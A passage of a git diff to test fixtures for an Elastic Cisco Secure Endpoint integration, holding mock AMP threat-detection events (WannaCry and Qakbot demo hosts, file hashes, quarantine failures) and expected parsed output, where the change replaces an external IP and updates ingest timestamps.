Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json index 67524d16665..f413457f352 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -24,7 +24,7 @@ "5ca4bef8de6def53519d4b22632675bb4c1e470b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -38,8 +38,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025200976Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", + "ingested": "2021-12-09T13:35:39.763772800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -61,7 +61,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -107,7 +107,7 @@ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -117,8 +117,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025206150Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}", + "ingested": "2021-12-09T13:35:39.763777600Z", + "original": 